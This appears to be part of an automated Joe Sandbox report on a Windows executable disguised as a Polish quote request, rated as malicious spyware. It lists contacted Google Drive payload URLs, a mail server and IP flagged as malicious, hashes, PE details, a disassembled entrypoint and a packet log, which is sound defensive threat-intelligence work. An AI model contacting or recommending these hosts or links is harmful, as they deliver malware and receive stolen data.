                          https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pRegAsm.exe, 00000010.00000003.1057519355.000000000134A000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000003.1053028532.0000000001334000.00000004.00000001.sdmpfalse
                            		high
                            https://sectigo.com/CPS0RegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://mail.reyesyasociados.comRegAsm.exe, 00000010.00000002.5655252764.000000001E064000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/OxHRegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpfalse
                              		high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://doc-0o-50-docs.googleusercontent.com/RegAsm.exe, 00000010.00000002.5633250471.00000000012CE000.00000004.00000020.sdmpfalse
                                		high
                                https://drive.google.com/RegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpfalse
                                  		high
                                  http://isQqqrU1x3qSl4S.netRegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000003.1969551904.0000000001381000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5655175240.000000001E060000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5655609885.000000001E08E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.185.193
                                  		googlehosted.l.googleusercontent.comUnited States
                                  		15169GOOGLEUSfalse
                                  109.169.39.245
                                  		mail.reyesyasociados.comUnited Kingdom
                                  		20860IOMART-ASGBtrue
                                  142.250.185.174
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:1383
                                  Start date:28.09.2021
                                  Start time:12:58:02
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 14m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:40
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.evad.winEXE@10/1@4/3
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 70
                                  • Number of non-executed functions: 13
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, UsoClient.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.207.122, 204.79.197.200, 13.107.21.200, 40.117.96.136, 13.107.5.88, 20.82.210.154, 40.112.88.60, 20.199.120.151, 52.242.101.226, 52.109.88.36, 40.125.122.151, 20.54.89.15, 52.152.108.96, 52.152.110.14, 20.50.102.62, 209.197.3.8, 52.184.217.56, 23.197.255.181, 51.124.78.146, 20.199.120.182
                                  • Excluded domains from analysis (whitelisted): geover.prod.do.dsp.mp.microsoft.com, geo.prod.do.dsp.trafficmanager.net, slscr.update.microsoft.com, e10370.g.akamaiedge.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, geover.prod.do.dsp.mp.microsoft.com.edgekey.net, slscr.update.microsoft.com.akadns.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, geo.prod.do.dsp.mp.microsoft.com, dual-a-0001.a-msedge.net, sls.update.microsoft.com.akadns.net, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, prod.nexusrules.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, settingsfd-geo.trafficmanager.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, array509.prod.do.dsp.mp.microsoft.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  13:02:24API Interceptor2602x Sleep call for process: RegAsm.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  109.169.39.245FACTURA.exeGet hashmaliciousBrowse
                                    LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                      Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                        BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                          BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                            Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              edge-web.dual-gslb.spotify.comPago de factura.exeGet hashmaliciousBrowse
                                              • 35.186.224.25
                                              payment confirmation.exeGet hashmaliciousBrowse
                                              • 35.186.224.25
                                              Unreal.exeGet hashmaliciousBrowse
                                              • 35.186.224.25
                                              hVlpEajflR.exeGet hashmaliciousBrowse
                                              • 35.186.224.25
                                              mail.reyesyasociados.comFACTURA.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                              • 109.169.39.245

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              IOMART-ASGBFACTURA.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              LISTA DE PEDIDO DE COMPRA.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              4czqYWTUq8Get hashmaliciousBrowse
                                              • 217.147.86.101
                                              b8uTZxALDhGet hashmaliciousBrowse
                                              • 176.56.205.97
                                              XMae11M5ygGet hashmaliciousBrowse
                                              • 109.75.167.7
                                              BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              shinto.x86Get hashmaliciousBrowse
                                              • 217.194.212.165
                                              BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                              • 109.169.39.245
                                              QkAgFhbO4a.exeGet hashmaliciousBrowse
                                              • 109.169.33.163
                                              ac1khvFT2V.exeGet hashmaliciousBrowse
                                              • 78.129.165.118
                                              Colis_____FR6627222019J01.vbsGet hashmaliciousBrowse
                                              • 5.77.41.150
                                              DriverPack-17-Online_749652650.1631058953__eqiqpdyx4midqk9.exeGet hashmaliciousBrowse
                                              • 87.117.239.150
                                              IcdLXZ5hGEGet hashmaliciousBrowse
                                              • 176.56.205.122
                                              xOMeOjIk7V.exeGet hashmaliciousBrowse
                                              • 78.129.249.105
                                              KW3VrbX3Av.exeGet hashmaliciousBrowse
                                              • 217.194.215.58
                                              EcyvrSp565.exeGet hashmaliciousBrowse
                                              • 217.194.215.58
                                              vigmCKdmz9Get hashmaliciousBrowse
                                              • 31.216.57.33
                                              T9V927Bbvx.exeGet hashmaliciousBrowse
                                              • 78.129.249.105

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19KLTRINGESTREGERNE.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              Pago de factura.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              InvPixcareer.-0048_20210927.xlsbGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              FmtpSM8PqG.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              jl9fLPhFtU.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              O4RiolgYtt.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              amm4Lw6xgJ.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              TWsmIoYqC6.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              bT2842KdOz.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              6SYurvkD8X.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              5d33XA71cr.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              ZXRYejz88D.dllGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              Fluidra Attachment.htmlGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              FACTURA.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              Hesap Hareketleri 28-09-2021.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              InvPixcareer.-289609891_20210927.xlsbGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              RCnbEaKhdD.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              X9iTxI3QtS.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              lcZoxd23lU.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193
                                              eh1Jd9oktL.exeGet hashmaliciousBrowse
                                              • 142.250.185.174
                                              • 142.250.185.193

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              \Device\ConDrv
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):30
                                              Entropy (8bit):3.964735178725505
                                              Encrypted:false
                                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                              MD5:9F754B47B351EF0FC32527B541420595
                                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: NordVPN directory not found!..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):5.697062658365674
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe
                                              File size:90112
                                              MD5:419a3e9ce6606d5ed7b22a7574e1a294
                                              SHA1:7c08e8f1f4f478df9baf5d00675bd174467621bc
                                              SHA256:3ebfb7cdc30291bcc995951dda1d8f62cea3e0beb990e35fabb3078b6d9d9921
                                              SHA512:9656f15444698040c29674c4370604397c37147c07924b1bc8751b62e3a437808c234f3f155a9af927f57084264b762d5daa949c3d76b2e9755ec17690cb656e
                                              SSDEEP:768:tKI6PD+GddmSjV7vdnt/L/qT/pYT2IO7vPPqRgAWn95fRiBLWfRrhTSgStnLYqwp:tP0+6mSjxvD/q7eT2HQgFn3OWflNULK
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...q.(T.................0... ...............@....@........

                                              File Icon

                                              Icon Hash:821ca88c8e8c8c00

                                              Static PE Info

                                              General

                                              Entrypoint:0x4012c8
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x5428C171 [Mon Sep 29 02:18:25 2014 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                              Entrypoint Preview

                                              Instruction
                                              push 0040FD84h
                                              call 00007FEEECE752C3h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              inc eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add al, dl
                                              sbb eax, 16A1B5FBh
                                              xchg eax, ecx
                                              inc ecx
                                              mov bh, A2h
                                              pop esi
                                              stosd
                                              xchg eax, ecx
                                              js 00007FEEECE752D2h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ecx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+69h], dl
                                              arpl word ptr [ebp+esi*2+72h], si
                                              dec eax
                                              push edx
                                              inc esi
                                              inc ecx
                                              push edx
                                              push esi
                                              inc ebp
                                              push esp
                                              add byte ptr [ecx+eax*2+47h], al
                                              inc ebp
                                              dec esi
                                              inc ebp
                                              push ebx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              dec esp
                                              xor dword ptr [eax], eax
                                              cmp byte ptr [ecx+4514D5FFh], dl
                                              push esi
                                              stosd
                                              inc edi
                                              cdq
                                              inc esp
                                              mov ah, EFh
                                              adc dh, byte ptr [esi-555086FBh]
                                              jmp 00007FEEECE752C5h
                                              das
                                              outsb
                                              rol dword ptr [ecx-69h], cl
                                              neg byte ptr [esp+esi]
                                              pop ecx
                                              cmp dword ptr [ecx-47h], esp
                                              cmp cl, byte ptr [edi-53h]
                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                              or al, 00h
                                              stosb
                                              add byte ptr [eax-2Dh], ah
                                              xchg eax, ebx
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              adc eax, ebp
                                              add byte ptr [eax], al
                                              mov eax, dword ptr [ecx]
                                              add byte ptr [eax], al
                                              add byte ptr [edx], cl
                                              add byte ptr [esp+eax*2+53h], al
                                              inc esp
                                              inc ecx
                                              inc edi
                                              inc ebp
                                              dec esi
                                              inc ebp
                                              push ebx
                                              add byte ptr [4E000401h], cl
                                              popad
                                              jo 00007FEEECE75333h

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x134840x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x540.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x128ec0x13000False0.512232730263data6.18689428252IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x150000x5400x1000False0.12939453125data1.40564634666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x154180x128GLS_BINARY_LSB_FIRST
                                              RT_GROUP_ICON0x154040x14data
                                              RT_VERSION0x150f00x314dataChineseTaiwan

                                              Imports

                                              DLLImport
                                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                              Version Infos

                                              DescriptionData
                                              Translation0x0404 0x04b0
                                              LegalCopyrightChatSwipe
                                              InternalNameSOOTIER
                                              FileVersion4.04.0001
                                              CompanyNameChatSwipe
                                              LegalTrademarksChatSwipe
                                              CommentsChatSwipe
                                              ProductNameChatSwipe
                                              ProductVersion4.04.0001
                                              FileDescriptionChatSwipe
                                              OriginalFilenameSOOTIER.exe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              ChineseTaiwan

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 28, 2021 13:02:13.281682968 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.281766891 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.281985998 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.310043097 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.310097933 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.364548922 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.364694118 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.364728928 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.364876032 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.367634058 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.367938042 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.576765060 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.576776981 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.576940060 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:13.577075958 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.583203077 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:13.625907898 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.119752884 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.119856119 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.120125055 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:14.120158911 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:14.120337963 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.120481968 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.120496035 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:14.120695114 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:14.166517973 CEST49726443192.168.11.20142.250.185.174
                                              Sep 28, 2021 13:02:14.166528940 CEST44349726142.250.185.174192.168.11.20
                                              Sep 28, 2021 13:02:14.202445984 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.202460051 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.202599049 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.202889919 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.202898026 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.236150980 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.236331940 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.236393929 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.236979008 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.237231970 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.240746975 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.240921974 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.241080046 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.241375923 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.281881094 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.470383883 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.470598936 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.470633984 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.470664024 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.470788002 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.470834970 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.471178055 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.471380949 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.472342968 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.472546101 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.472579002 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.472619057 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.472727060 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.472800016 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.473004103 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.473196983 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.473243952 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.473431110 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.479754925 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.479994059 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.480066061 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.480190992 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.480257034 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.480307102 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.480418921 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.480494022 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.480706930 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.480901003 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.480971098 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.481158972 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.481257915 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.481475115 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.481540918 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.481775045 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.482062101 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.482245922 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.482290030 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.482475996 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.482678890 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.482863903 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.482918978 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.483084917 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.483320951 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.483494043 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.483549118 CEST44349727142.250.185.193192.168.11.20
                                              Sep 28, 2021 13:02:14.483735085 CEST49727443192.168.11.20142.250.185.193
                                              Sep 28, 2021 13:02:14.483916998 CEST44349727142.250.185.193192.168.11.20
